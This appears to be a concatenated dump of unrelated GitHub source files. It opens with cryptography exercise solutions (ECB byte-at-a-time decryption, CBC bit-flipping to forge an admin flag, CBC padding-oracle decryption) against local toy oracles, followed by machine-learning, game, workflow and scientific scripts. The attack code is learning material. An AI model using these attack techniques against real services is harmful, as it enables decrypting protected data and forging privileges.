anyway\n input_block = craft_input_block(block_size-1)\n inputs_dict = {}\n result = b''\n magic_size = len(magic_text)\n\n # craft the attack dictionary\n for j in range(256):\n new_input = input_block + bytes([j])\n new_input_result = magic_text_oracle(new_input, key, magic_text, add_rand_chars=False)\n inputs_dict[new_input_result[0:block_size]] = j\n\n for i in range(magic_size):\n this_magic = magic_text[i:magic_size]\n byte_short_result = magic_text_oracle(input_block, key, this_magic, add_rand_chars=False)[0:block_size]\n result = result + bytes(chr(inputs_dict[byte_short_result]), \"utf-8\")\n\n return result\n\ndef fetch(block_size, random_prepend, key):\n cached_size = None\n for i in range(0, block_size+1):\n crafted_input = b'A' * i\n if not cached_size:\n cached_size = len(magic_text_oracle(random_prepend + crafted_input, key, b'', add_rand_chars=False))\n else:\n temp = len(magic_text_oracle(random_prepend + crafted_input, key, b'', add_rand_chars=False))\n if (temp > (cached_size + 1)):\n pad_for_rand = b'A' * (i-1)\n assert(((len(random_prepend) + (len(pad_for_rand)+1)) % block_size) == 0)\n return pad_for_rand\n\ndef decrypt_magic_text_harder(magic_text, key, random_prepend):\n \"\"\"\n Decrypts magic_text using byte_at_a_time decryption, when random_prepend is \n being prepended to all calls\n \"\"\"\n magic_text = base64.b64decode(magic_text)\n block_size = detect_block_size(key) # is 16, but we compute anyway\n input_block = craft_input_block(block_size-1)\n inputs_dict = {}\n result = b''\n magic_size = len(magic_text)\n\n # We need to figure out the size of the random_prepend. We can probably\n # do this by figuring out at what point the block size \"jumps\"...\n # Suppose block size 8. 3 + 5 --> 8. 4 + 4 --> 8... 8 + 1 --> 16!\n # So we need to find when block size \"jumps\" by n-1, where n is block size\\\n pad_for_rand = fetch(block_size, random_prepend, key)\n\n # Now we know that random_prepend + pad_for_rand gets us a nice block with one free byte at the end.\n # We can craft an attack dictionary based on this.\n size_to_slice = len(random_prepend) + len(pad_for_rand) + 1\n for j in range(256):\n # new_input is going to be random_prepend + pad_for_rand + a target byte\n new_input = random_prepend + pad_for_rand + bytes([j])\n new_input_result = magic_text_oracle(new_input, key, magic_text, add_rand_chars=False)\n inputs_dict[new_input_result[0:size_to_slice]] = j\n\n for i in range(magic_size):\n this_magic = magic_text[i:magic_size]\n byte_short_result = magic_text_oracle(random_prepend + pad_for_rand, key, this_magic, add_rand_chars=False)[0:size_to_slice]\n result = result + bytes(chr(inputs_dict[byte_short_result]), \"utf-8\")\n\n return result\n\n\ndef parse_kv(instring):\n # this is the silliest dictionary comprehension\n return {i[0]: i[1] for i in [j.split(\"=\") for j in [i for i in instring.split(\"&\")]]}\n\ndef profile_for(email):\n email = email.replace(\"&\", \"\\&\").replace(\"=\", \"\\=\")\n uid = 10 # being lazy :D;;;\n role = 'user'\n return (\"email=\" + email + \"&uid=\" + str(uid) + \"&role=\" + role)\n\ndef copypasta_attack():\n key = random_aes_key()\n my_plaintext = profile_for(\"julia@flowerhack.com\")\n my_encrypted_text = magic_text_oracle(bytes(my_plaintext, \"utf-8\"), key, b'', add_rand_chars=False)\n my_decrypted_text = magic_text_oracle(my_encrypted_text, key, b'', add_rand_chars=False, action=\"decrypt\")\n\n # only use user input for profile_for and ciphertexts to make an admin\n\ndef strip_padding(padded_string):\n \"\"\"\n Strips away the PKCS7 padding from a string and returns it. If padding is\n invalid, raises a PaddingException\n \"\"\"\n reversed_input = padded_string[::-1]\n # 01 is valid, 02 02 is valid, 03 03 03 is valid...\n for i in range(1, len(reversed_input)):\n if [val for val in reversed_input[0:i]] == [i for num in range(0,i)]:\n return padded_string[:-i]\n raise PaddingException\n\ndef insert_in_query_and_cbc_encrypt(inbytes, key):\n \"\"\" Inserts user input into the querystring provided in challenge 16 \"\"\"\n prepend = b'comment1=cooking%20MCs;userdata='\n append = b';comment2=%20like%20a%20pound%20of%20bacon'\n newbytes = (prepend + inbytes.replace(b';', b'\\;').replace(b'=', b'\\=') + append)\n paddedbytes = pkcs7_padding(newbytes, 16)\n crypted = cbc_mode(paddedbytes, key, b'\\x00', \"encrypt\", from_b64=False)\n return crypted\n\ndef find_admin_user_in_cbc_encrypted_text(inbytes, key):\n \"\"\"\n Takes a CBC encrypted byte object and sees if the decrypted result has an\n admin user\n \"\"\"\n decrypted = cbc_mode(inbytes, key, b'\\x00', \"decrypt\", from_b64=False)\n if b';admin=true' in decrypted:\n return True\n else:\n return False\n\ndef bitfip_attack(inbytes, key):\n \"\"\"\n Very narrowly focused on the attack in challenge 16.\n Could mod later to make reusable probs\n \"\"\"\n byte_pos_first = None\n byte_pos_second = None\n for i in range(0, 256):\n temp = cbc_mode(inbytes[0:37] + bytes([i]) + inbytes[38:], key, b'\\x00', \"decrypt\", from_b64=False)\n if b';admin' in temp:\n byte_pos_first = i\n for i in range(0, 256):\n temp = cbc_mode(inbytes[0:43] + bytes([i]) + inbytes[44:], key, b'\\x00', \"decrypt\", from_b64=False)\n if b'admin=' in temp:\n byte_pos_second = i\n return (inbytes[0:37] + bytes([byte_pos_first]) + inbytes[38:43] + bytes([byte_pos_second]) + inbytes[44:])\n\ndef cbc_crypt_random_line(infile, key, from_b64=False):\n random_line = bytes(choice(open(infile).readlines()), \"utf-8\")\n iv = b'\\x00'\n crypted = cbc_mode(pkcs7_padding(random_line, 16), key, iv, \"encrypt\", from_b64=from_b64)\n return (crypted, iv, random_line)\n\ndef cbc_padding_oracle(cyphertext, key, iv):\n decrypted = cbc_mode(cyphertext, key, iv, \"decrypt\", from_b64=False)\n try:\n strip_padding(decrypted)\n return True\n except PaddingException:\n return False\n\ndef attack_cbc(cyphertext, key, iv, ref):\n #last_cypherblock = cyphertext[-16:]\n #nextlast_cypherblock = cyphertext[-32:-16]\n # ASSUMING KEYSIZE=16 FOR LIKE EVERYTHING i am a terrible hardcoding person sorry\n # ASSUMING IV IS 0\n\n cyphertext = (iv*16) + cyphertext\n len_cyphertext = len(cyphertext)\n cur_spot = len_cyphertext\n final_plaintext = b''\n\n while (cur_spot-32) >= 0:\n last_cypherblock = cyphertext[cur_spot-16:cur_spot]\n nextlast_cypherblock = cyphertext[cur_spot-32:cur_spot-16]\n\n # initialize stuff for this cycle\n plaintext = bytearray(16)\n guessed_bytes = bytes(0)\n expected_byte = 1\n for position in reversed(range(16)):\n # We are currently decoding the plaintext that corresponds to last cypherblock.\n for i in range(0, 256):\n fake_cyphertext = bytes(position) + bytes([i]) + guessed_bytes + last_cypherblock\n if cbc_padding_oracle(fake_cyphertext, key, iv):\n # in this case we think i must be the value of th plaintext at that spot?\n #import pdb; pdb.set_trace()\n # that is, p = p'[16] ^ i/c'[16] ^ c[16]\n plaintext[position] = expected_byte ^ i ^ nextlast_cypherblock[position]\n expected_byte = expected_byte + 1\n guessed_bytes = bytes(0)\n for pos_to_guess in range(position, 16):\n guessed_bytes = guessed_bytes + bytes([expected_byte ^ plaintext[pos_to_guess] ^ nextlast_cypherblock[pos_to_guess]])\n final_plaintext = plaintext + final_plaintext\n cur_spot = cur_spot-16\n return final_plaintext\n\n# key = 'YELLOW SUBMARINE'\n# nonce = 0\n# format = 64 bit unsigned little endian nonce, \n# 64 bit little endian block count (byte count / 16)\n# nonce + counter: ENCRYPT WITH KEY, then XOR with plaintext\ndef ctr_stream(text, key, nonce):\n packnonce = struct.pack(' torch.Tensor:\n self.rnn.flatten_parameters()\n\n output, _ = self.rnn(x)\n return output\n \n def get_output_dim(self):\n return self.rnn.hidden_size*(1 + int(self.rnn.bidirectional))\n\nclass Seq2SeqVec_CNN(Seq2SeqVec):\n def __init__(self,\n input_size,\n hidden_size,\n kernel_size = 3,\n activation: str = 'tanh'\n ):\n super().__init__()\n\n if kernel_size % 2 != 1:\n raise RuntimeError(f'For Seq2SeqVec model, kernel_size ({kernel_size}) should be odd so that output has same length as input')\n \n self.cnn = nn.Conv1d(input_size, hidden_size, kernel_size,\n padding = (kernel_size - 1) // 2)\n self.act = ACT_MAPPING[activation]()\n \n def forward(self, x: torch.Tensor, *args, **kwargs) -> torch.Tensor:\n # x: (batch, seq_len, dim)\n cnn_out = self.cnn(torch.transpose(x, 2, 1))\n # (batch_size, hid_dim, seq_len)\n cnn_out = torch.transpose(cnn_out, 2, 1)\n cnn_out = self.act(cnn_out)\n return cnn_out\n\n\nclass Seq2SeqVec_CNNRNN(Seq2SeqVec_RNN):\n def __init__(self,\n rnn_type: str,\n input_size: int,\n hidden_size: int,\n num_layers: int,\n cnn_out_size: Optional[int] = None,\n kernel_size: int = 3,\n dropout: float = 0.,\n bidirectional: bool = True,\n activation: str = 'tanh'\n ):\n if cnn_out_size is None:\n cnn_out_size = hidden_size\n \n super().__init__(\n rnn_type, cnn_out_size, hidden_size, num_layers,\n dropout = dropout, bidirectional= bidirectional\n )\n \n if kernel_size % 2 != 1:\n raise RuntimeError(f'For Seq2SeqVec model, kernel_size ({kernel_size}) should be odd so that output has same length as input')\n self.cnn = nn.Conv1d(\n input_size,\n cnn_out_size,\n kernel_size = kernel_size,\n padding = (kernel_size - 1) // 2\n )\n self.cnn_act = ACT_MAPPING[activation]()\n \n def forward(self, x: torch.Tensor) -> torch.Tensor:\n self.rnn.flatten_parameters()\n\n cnn_out = self.cnn(torch.transpose(x, 2, 1))\n # (batch_size, hid_dim, seq_len)\n cnn_out = torch.transpose(cnn_out, 2, 1)\n cnn_out = self.cnn_act(cnn_out)\n\n output, (h_n, _) = self.rnn(cnn_out)\n\n return output\n\n\n# ------------\n# Sent2SeqVec models\n# ------------\nclass Sent2SeqVec_Emb(Sent2SeqVec):\n \"\"\"\n Embedding based Sent2SeqVec model\n forward(x)\n \"\"\"\n def __init__(self,\n vocab_size: int,\n emb_dim: int,\n seq2seqvec_name: str,\n seq2seqvec_args: dict\n ):\n super().__init__()\n\n self.emb = nn.Embedding(vocab_size, emb_dim)\n seq2seqvec_args['input_size'] = emb_dim\n self.seq2seqvec = Seq2SeqVec.from_name(seq2seqvec_name)(**seq2seqvec_args)\n \n def forward(self, x, *args, **kwargs):\n # to be compatible with bert\n return self.seq2seqvec(self.emb(x))\n \n def get_output_dim(self):\n return self.seq2seqvec.get_output_dim()\n\nclass Sent2SeqVec_Bert(Sent2SeqVec):\n \"\"\"\n Bert encoder.\n\n Load pretrained parameters from bert_path and support customized number of layers.\n\n forward(input_ids, attention_mask, token_type_ids)\n \"\"\"\n def __init__(self,\n bert_path: str,\n num_layers: int,\n bert_config: Optional[PretrainedConfig] = None,\n load_pretrain = True\n ):\n super().__init__()\n\n if bert_config is None:\n cfg_dt, cfg_kws = BertConfig.get_config_dict(bert_path)\n cfg_dt['num_hidden_layers'] = num_layers\n bert_config = BertConfig(**cfg_dt, **cfg_kws)\n \n self.bert = BertModel(bert_config)\n if load_pretrain:\n bert_pretrain = BertModel.from_pretrained(bert_path)\n self.bert.load_state_dict(bert_pretrain.state_dict(), strict = False)\n\n def forward(self, input_ids, attention_mask = None, token_type_ids = None):\n bert_out = self.bert(input_ids, attention_mask, token_type_ids)\n \n return bert_out[0] # change. only need the output sequence\n \n def get_output_dim(self):\n return self.bert.config.hidden_size \n","repo_name":"srhthu/deepnlp","sub_path":"deepnlp/nn_modules/seq2seqvec.py","file_name":"seq2seqvec.py","file_ext":"py","file_size_in_byte":7496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25344667026","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 6 15:23:59 2020\n\n@author: spi112884\n\"\"\"\nfrom imageai.Detection.Custom import CustomObjectDetection\nimport os\n\narr = os.listdir('validation/images')\n\n\ndetector = CustomObjectDetection()\ndetector.setModelTypeAsYOLOv3()\ndetector.setModelPath(\"detection_model-ex-011--loss-0007.150.h5\")\ndetector.setJsonPath(\"json/detection_config.json\")\ndetector.loadModel()\n\nfor imagem in arr:\n print (imagem)\n detections = detector.detectObjectsFromImage(input_image='validation/images/'+imagem, output_image_path=imagem)\n for detection in detections:\n print(detection[\"name\"], \" : \", detection[\"percentage_probability\"], \" : \", detection[\"box_points\"])\n\n\n\n\n","repo_name":"julianoppca/Projeto_PPCA_2020","sub_path":"Deteccao de objetos/Possiveis drogas/detecta_em_imagens.py","file_name":"detecta_em_imagens.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70241493548","text":"# coding: utf-8\n\nimport ui\nimport random\n\nBG_CELL = (0.9, 0.9, 0.9, 1.0)\nBG_BOARD = (0.9, 0.85, 0.8, 1.0)\n\nclass Board (ui.View):\n\tdef __init__(self):\n\t\tself.width = 1024\n\t\tself.height = 700\n\t\t\n\t\tself.background_color = BG_BOARD\n\t\n\tdef add_cell(self, text, col, row, touch_handler):\n\t\tx_pos = ((self.width / 5) * col) - (self.width / 10)\n\t\ty_pos = ((self.height / 5) * row) - (self.height / 10)\n\t\t\n\t\tcell = Cell(text, x_pos, y_pos, touch_handler)\n\t\tself.add_subview(cell)\n\n\nclass Cell (ui.View):\n\tdef __init__(self, text, x, y, touch_handler):\n\t\t#self.multitouch_enabled = False\n\t\tself.is_clicked = False\n\t\t\n\t\tself.name = text\n\t\t\n\t\tself.background_color = BG_CELL\n\t\tself.border_width = 1.0\n\t\tself.border_color = 0.3\n\t\tself.width = 200\n\t\tself.height = 100\n\t\t#self.flex = 'WH'\n\t\tself.corner_radius = 5\n\t\t\n\t\tself.center = (x, y)\n\t\t\n\t\tlabel = ui.Label(name=text)\n\t\t#label.flex = 'LRT'\n\t\tlabel.font = ('', 24)\n\t\tlabel.text = text\n\t\tlabel.alignment = ui.ALIGN_CENTER\n\t\tlabel.size_to_fit()\n\t\tlabel.center = (self.width / 2, self.height / 2)\n\t\t#label.line_break_mode = ui.LB_CLIP\n\t\t#label.number_of_lines = 1\n\t\t\n\t\tself.add_subview(label)\n\t\tself.label = label\n\t\t\n\t\tself.touch_handler = touch_handler\n\t\tself.last_ended_time = 0\n\t\n\tdef touch_ended(self, touch):\n\t\t# touch ended outside view, ignore it\n\t\tif not 0 < touch.location[0] < self.width:\n\t\t\treturn\n\t\t\n\t\tif not 0 < touch.location[1] < self.height:\n\t\t\treturn\n\t\t\n\t\t# doubleclick checker\n\t\tif touch.timestamp - self.last_ended_time <= 0.2:\n\t\t\tfor subview in self.superview.subviews:\n\t\t\t\tsubview.background_color = BG_CELL\n\t\t\t\tsubview.label.text_color = 'black'\n\t\t\tself.superview.background_color = BG_BOARD\n\t\t\treturn\n\t\t\n\t\tself.last_ended_time = touch.timestamp\n\t\t\n\t\t# register as a proper click\n\t\tself.touch_handler(self)\n\t\n\tdef turn_red(self):\n\t\tself.background_color = (1.0, 0, 0, 1)\n\t\tself.label.text_color = 'white'\n\t\n\tdef turn_blue(self):\n\t\tself.background_color = (0, 0, 1.0, 1)\n\t\tself.label.text_color = 'white'\n\t\n\tdef turn_grey(self):\n\t\tself.background_color = (0.5, 0.5, 0.5, 1)\n\t\tself.label.text_color = 'white'\n\t\n\tdef turn_black(self):\n\t\tself.background_color = (0, 0, 0, 1)\n\t\tself.label.text_color = 'white'\n\n\ndef touch_handler(cell):\n\tglobal red_words, blue_words\n\tglobal red_revealed, blue_revealed\n\tif cell.name in red_words:\n\t\tcell.turn_red()\n\t\tred_revealed += 1\n\telif cell.name in blue_words:\n\t\tcell.turn_blue()\n\t\tblue_revealed += 1\n\telif cell.name in assassin:\n\t\tcell.turn_black()\n\telse:\n\t\tcell.turn_grey()\n\n\nWORDLIST = []\nwith open(\"wordlist.txt\", 'r') as f:\n\tWORDLIST = f.readlines()\n\nred_index = random.randint(8,9)\nblue_index = 17 - red_index\nwords = random.sample(WORDLIST, 25)\nassassin = words[0]\nred_words = words[1:red_index+1]\nblue_words = words[red_index+1:18]\nred_revealed = 0\nblue_revealed = 0\n\nv = Board()\n\nrandom.shuffle(words)\ncol = 1\nrow = 1\nfor word in words:\n\tv.add_cell(word, col, row, touch_handler)\n\tcol += 1\n\tif col == 6:\n\t\tcol = 1\n\t\trow += 1\n\nfor cell in v.subviews:\n\ttouch_handler(cell)\n\nif len(red_words) > len(blue_words):\n\tv.background_color = '#ffaaaa'\nelse:\n\tv.background_color = '#aac8ff'\n\n\nv.present('full_screen')\n","repo_name":"Kitryn/codenames-pythonista","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17539839321","text":"\nimport typing\nfrom typing import Optional\nfrom dotenv import load_dotenv\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\nfrom core.workflows.abstract_workflow import AbstractWorkflow\n\nclass InputProduct(BaseModel):\n product_name: str\n\nclass OutputProductReviews(BaseModel):\n spreadsheet_url: str\n\nclass AmazonReviewScraperWorkflow(AbstractWorkflow):\n def __init__(self) -> None:\n super().__init__()\n\n async def transform(\n self, args: InputProduct, callbacks: typing.Any\n ) -> OutputProductReviews:\n results_dict = await super().transform(args=args, callbacks=callbacks)\n spreadsheet_url = results_dict['spreadsheet_created'].spreadsheet_url\n out = OutputProductReviews(spreadsheet_url=spreadsheet_url)\n return out\n\nload_dotenv()\namazon_review_scraper_app = FastAPI()\n\n@amazon_review_scraper_app.post(\"/transform/\")\nasync def transform(\n args: InputProduct,\n) -> OutputProductReviews:\n amazon_review_scraper = AmazonReviewScraperWorkflow()\n return await amazon_review_scraper.transform(args, callbacks=None)\n\n","repo_name":"yeagerai/yWorkflows-AmazonReviewScraperWorkflow-by-Albert-Castellana-3600-b0d9731a","sub_path":"components/amazon_review_scraper_workflow/amazon_review_scraper_workflow.py","file_name":"amazon_review_scraper_workflow.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32236826388","text":"#!/usr/bin/python\n# coding=utf-8\n\nimport os\nimport logging\n\nfrom utils.constants import EXC_INFO_TYPE\n\n\nclass OneLineExceptionFormatter(logging.Formatter):\n def formatException(self, exc_info: EXC_INFO_TYPE) -> str:\n result = super().formatException(exc_info)\n return repr(result)\n\n def format(self, record: logging.LogRecord) -> str:\n # noinspection StrFormat\n result = super().format(record)\n if record.exc_text:\n result = result.replace('\\n', '')\n return result\n\n @classmethod\n def logger_initialisation(cls, debug: bool = False) -> None:\n debug_level: bool = debug and 'DEBUG' or 'INFO'\n handler: logging.StreamHandler = logging.StreamHandler()\n formatter: OneLineExceptionFormatter = cls(logging.BASIC_FORMAT)\n handler.setFormatter(formatter)\n root: logging.Logger = logging.getLogger()\n root.setLevel(os.environ.get('LOGLEVEL', debug_level))\n root.addHandler(handler)\n","repo_name":"jffin/urls_list_scanner","sub_path":"utils/logger_formatter.py","file_name":"logger_formatter.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35055693525","text":"# ***************************************************************\r\n# File : hbond_correlation.py \r\n# Used to calculate H-bond correlation functions S(t),C(t),Sd(t),Cd(t) \r\n\r\n# usage: python hbond_correltion.py [-h] f side atoms\r\n\r\n# positional arguments:\r\n# f Name of the trajectory file\r\n# side Size of the box\r\n# atoms Total number of atoms\r\n\r\n# optional arguments:\r\n# -h, --help show help message \r\n# ***************************************************************\r\n\r\nfrom itertools import islice,izip\r\nfrom hbond_pair import hbond,popvar\r\nfrom multiprocessing import Pool\r\nimport matplotlib.pyplot as plt\r\nimport argparse,time\r\nfrom math import log\r\n\r\n\r\ndef parse(): #function to parse command-line arguments \r\n parser = argparse.ArgumentParser(description='Hydrogen Bond Analysis')\r\n parser.add_argument(\"f\", type=str, help=\"Name of the trajectory file\")\r\n parser.add_argument(\"side\" ,type=float,help=\"Size of the box\")\r\n parser.add_argument(\"atoms\",type=int, help=\"Total number of atoms\")\r\n args=parser.parse_args() \r\n return [args.f, args.side, args.atoms]\r\n\r\n\r\ndef get_h(tmp): #process the frame and call fortran module \r\n tmp =[map(float,line.split()[3:6]) for line in tmp[:768]]\r\n return hbond(tmp,side)\r\n\r\n\r\ndef calculate(): #returns number of h-bond and their probability \r\n hframe=[]\r\n pl=Pool() #create a pool of worker processes\r\n with open(file) as f:\r\n while True:\r\n tmp=list(islice(f,9,9+atoms)) #read one time frame from file\r\n if not tmp: break\r\n hframe.append(pl.apply_async(get_h,[tmp])) #load the function call to a worker in parallel\r\n pl.close()\r\n pl.join()\r\n hframe=[i.get() for i in hframe]\r\n hframe,hdframe=zip(*hframe)\r\n shb,chb,shbd,chbd=popvar(hframe,hdframe)\r\n return shb,chb,shbd,chbd\r\n\r\nfile,side,atoms=parse()\r\n\r\ndef save(a,b,c): \t\t\t\t\t\t\t\t\t#save the data\r\n txt=\"\\n\".join(\"%s %s\"%(i,j) for i,j in zip(a,b))\r\n with open(c+\"_correlation.dat\",\"w\") as f:\r\n f.write(txt)\r\n\r\nif __name__ == '__main__':\r\n shb,chb,shbd,chbd=calculate()\r\n x=[i/1000.0 for i in xrange(len(shb))]\r\n save(x,shb,\"shb\")\r\n save(x,chb,\"chb\")\r\n save(x,shbd,\"shbd\")\r\n save(x,chbd,\"chbd\")","repo_name":"Koushikphy/Molecular-Dynamics","sub_path":"upload/hbond_correlation.py","file_name":"hbond_correlation.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34271488681","text":"from scipy.sparse import random\nimport numpy as np\nfrom qpsolvers import solve_qp\nimport matplotlib.pyplot as plt\nimport cvxpy as cp\n\n## Problem 4.(4)\n# Define parameters\nn = 100 # nodes\nm = 10 # edges\n\nnp.random.seed(5615234)\nA = random(n, m, density=0.02).A # sparse matrix A\nfor i in range(n):\n for j in range(m):\n if A[i, j] > 0.5: # to call a ndarray type A, use A[0,0]\n A[i, j] = 1\n elif A[i, j] > 0:\n A[i, j] = -1\n\nnp.random.seed(2922963)\nx = random(m, 1, density=0.3).A\nnp.random.seed(2648157)\ny = random(m, 1, density=0.5).A\n\ns = A.dot(x)\nt = A.dot(y)\n\nsSumNonZero = (s!=0).sum() # check nonzero elements\ntSumNonZero = (t!=0).sum() # check nonzero elements\n\n# Check if x and y are feasible\n# Q, R = np.linalg.qr(A)\n# xf = np.linalg.inv(R).dot(Q.T.dot(s))\n# yf = np.linalg.inv(R).dot(Q.T.dot(t))\n\n# Define primal variables\nx = np.zeros((m, 1))\ny = np.zeros((m, 1))\n\n# Define dual variables\nlambda1 = np.zeros((n, 1))\nlambda2 = np.zeros((n, 1))\nmu1 = np.zeros((m, 1))\nmu2 = np.zeros((m, 1))\n\n# Dual decomposition\niterMax = 200\np = [] # primal optimal\nq = [] # dual optimal\n\n\n# Solution by scipy\ndef bi_commodity(n, m, ss, tt, aa):\n # Declare variables and parameters\n x = cp.Variable((m, 1))\n y = cp.Variable((m, 1))\n s = cp.Parameter((n, 1))\n s.value = ss\n t = cp.Parameter((n, 1))\n t.value = tt\n a = cp.Parameter((n, m))\n a.value = aa\n\n # Choose objective function\n obj = cp.Minimize(cp.sum((x + y) ** 2) + 0.1 * (sum(x ** 2) + sum(y ** 2)))\n\n # Declare constraints\n constraints = [a @ x == s,\n a @ y == t,\n x >= 0,\n y >= 0]\n\n # Solve\n prob = cp.Problem(obj, constraints)\n prob.solve()\n if (prob.status == 'optimal'):\n return prob.status, prob.value, x.value, y.value\n else:\n return prob.status, np.nan, np.nan, np.nan\n\n\nstatus, value, xx, yy = bi_commodity(n, m, s, t, A)\n\n\n# error_x = A.dot(xx) - s\n# error_y = A.dot(yy) - t\n\n\n# Define argmin F(x) for step 1 of distributed algorithm\ndef argminxy(delta1, delta2):\n P = np.array([[2.2, 2.], [2., 2.2]])\n q = np.array([[delta1, delta2]]).reshape((2,))\n G = np.array([[-1., 0.], [0., -1.]])\n h = np.array([0., 0.]).reshape((2,))\n\n # Solve QP\n x = solve_qp(P, q, G, h)\n # p = 1 / 2 * np.dot(np.dot(x, P), x) + np.dot(q, x)\n return x[0], x[1]\n\n\n# Dual decomposition\nfor i in range(iterMax):\n # Step 1: calculate x_min and y_min\n delta1 = A.transpose().dot(lambda1)\n delta2 = A.transpose().dot(lambda2)\n for j in range(m):\n x[j, 0], y[j, 0] = argminxy(delta1[j, 0], delta2[j, 0])\n\n # Step 2: calculate p and q\n lag = sum((x + y) ** 2) + 0.1 * sum(x ** 2 + y ** 2) \\\n + lambda1.transpose().dot(-s + A.dot(x)) + lambda2.transpose().dot(-t + A.dot(y))\n q = np.append(q, lag)\n f = sum((x + y) ** 2) + 0.1 * sum(x ** 2 + y ** 2)\n p = np.append(p, f)\n\n # Step 3: update dual variables with subgradient method\n alphak = 0.1 # step size\n lambda1 = lambda1 + alphak * (-s + A.dot(x))\n lambda2 = lambda2 + alphak * (-t + A.dot(y))\n\nplt.figure()\nplt.plot(np.arange(0, iterMax, 1), p)\nplt.xlabel('iteration')\nplt.ylabel('p')\nplt.title('Primal optimisation value versus iteration k')\nplt.show()\n\nplt.figure()\nplt.plot(np.arange(0, iterMax, 1), q)\nplt.xlabel('iteration')\nplt.ylabel('q')\nplt.title('Dual optimisation value versus iteration k')\nplt.show()\n","repo_name":"LinesKing/Introduction-to-Optimisation-ELEN90026_2021_SM1","sub_path":"Notes/Assignment 2/Problem4_4.py","file_name":"Problem4_4.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35444215701","text":"sentence = \"whale hello there. Don't we all love whales? I absolutely love whales! whales are so huge!!!\"\nwhale = 0\nfor x in range(0,len(sentence)):\n a = sentence[x:x+5]\n if a == \"whale\":\n whale = whale+1\nprint(str(whale))\n\nwhale = 0\nwith open('moby.txt') as f:\n for line in f:\n sentence = line.strip()\n for x in range(0,len(sentence)):\n a = sentence[x:x+5]\n if a == \"whale\" or a == \"Whale\" or a == \"WHALE\":\n whale = whale+1\n#or you can just do sentence[x:x+5].lower()\nprint(str(whale))\nf.close()\n\n\n","repo_name":"IsabelleWangg/Comp_Sci_Sem_2","sub_path":"Python/999_Exercises/Moby Dick/baseNEW.1.py","file_name":"baseNEW.1.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74172935148","text":"import pygame\n\npygame.init()\nscreen = pygame.display.set_mode((640, 480))\nclock = pygame.time.Clock()\n\nclass callByRef:\n def __init__(self, **args):\n for (key, value) in args.items():\n setattr(self, key, value)\nvariables = callByRef(\n running = True,\n background_colour = ( 0, 0, 0, 255),\n color_exit = (255, 0, 0, 255), # VER: maze\n level_number = 1, # Ver: maze\n player1_color = (255, 255, 0 ), # Ver: line\n player1_x_pos = None, # Ver: line\n player1_y_pos = None, # Ver: line\n player1_x_move = None, # Ver: line\n player1_y_move = None, # Ver: line\n player2_color = (255, 0, 0 ), # Ver: player2\n player2_x_pos = None, # Ver: player2\n player2_y_pos = None, # Ver: player2\n player2_x_move = None, # Ver: player2\n player2_y_move = None, # Ver: player2\n player1_score = 0, # Ver: score\n player2_score = 0, # Ver: score\n)\n\ndef reset():\n pygame.draw.rect(screen, variables.background_colour, pygame.Rect(0, 0, screen.get_width(), screen.get_height()))\n #level_image = pygame.image.load(\"MazeLevel%d.gif\" % level_number) # VER: maze\n #screen.blit(level_image, level_image.get_rect()) # VER: maze\n variables.player1_x_pos = 50 # Ver: line\n variables.player1_y_pos = 50 # Ver: line\n variables.player1_x_move = 1 # Ver: line\n variables.player1_y_move = 0 # Ver: line\n variables.player2_x_pos = screen.get_width() - 50 # Ver: player2\n variables.player2_y_pos = screen.get_height() - 50 # Ver: player2\n variables.player2_x_move = -1 # Ver: player2\n variables.player2_y_move = 0 # Ver: player2\n\nreset()\nwhile variables.running:\n clock.tick(60)\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n variables.running = False\n \n keys = pygame.key.get_pressed() # Ver: input\n if keys[pygame.K_ESCAPE]: # Ver: input\n variables.running = False # Ver: input\n # Ver: input\n if keys[pygame.K_UP ]: # Ver: input\n variables.player1_x_move = 0 # Ver: input\n variables.player1_y_move = -1 # Ver: input\n if keys[pygame.K_RIGHT ]: # Ver: input\n variables.player1_x_move = 1 # Ver: input HIDE\n variables.player1_y_move = 0 # Ver: input HIDE\n if keys[pygame.K_LEFT ]: # Ver: input HIDE\n variables.player1_x_move = -1 # Ver: input HIDE\n variables.player1_y_move = 0 # Ver: input HIDE\n if keys[pygame.K_DOWN ]: # Ver: input HIDE\n variables.player1_x_move = 0 # Ver: input HIDE\n variables.player1_y_move = 1 # Ver: input HIDE\n # Ver: player2\n if keys[pygame.K_w ]: # Ver: player2\n variables.player2_x_move = 0 # Ver: player2\n variables.player2_y_move = -1 # Ver: player2\n if keys[pygame.K_d ]: # Ver: player2\n variables.player2_x_move = 1 # Ver: player2 HIDE\n variables.player2_y_move = 0 # Ver: player2 HIDE\n if keys[pygame.K_a ]: # Ver: player2 HIDE\n variables.player2_x_move = -1 # Ver: player2 HIDE\n variables.player2_y_move = 0 # Ver: player2 HIDE\n if keys[pygame.K_s ]: # Ver: player2 HIDE\n variables.player2_x_move = 0 # Ver: player2 HIDE\n variables.player2_y_move = 1 # Ver: player2 HIDE\n # Ver: player2\n variables.player1_x_pos = variables.player1_x_pos + variables.player1_x_move # Ver: line\n variables.player1_y_pos = variables.player1_y_pos + variables.player1_y_move # Ver: line\n # Ver: line\n variables.player2_x_pos = variables.player2_x_pos + variables.player2_x_move # Ver: player2\n variables.player2_y_pos = variables.player2_y_pos + variables.player2_y_move # Ver: player2 HIDE\n # Ver: player2\n if variables.player1_x_pos<=0 : variables.player1_x_pos = screen.get_width() -1 # VER: wrap\n if 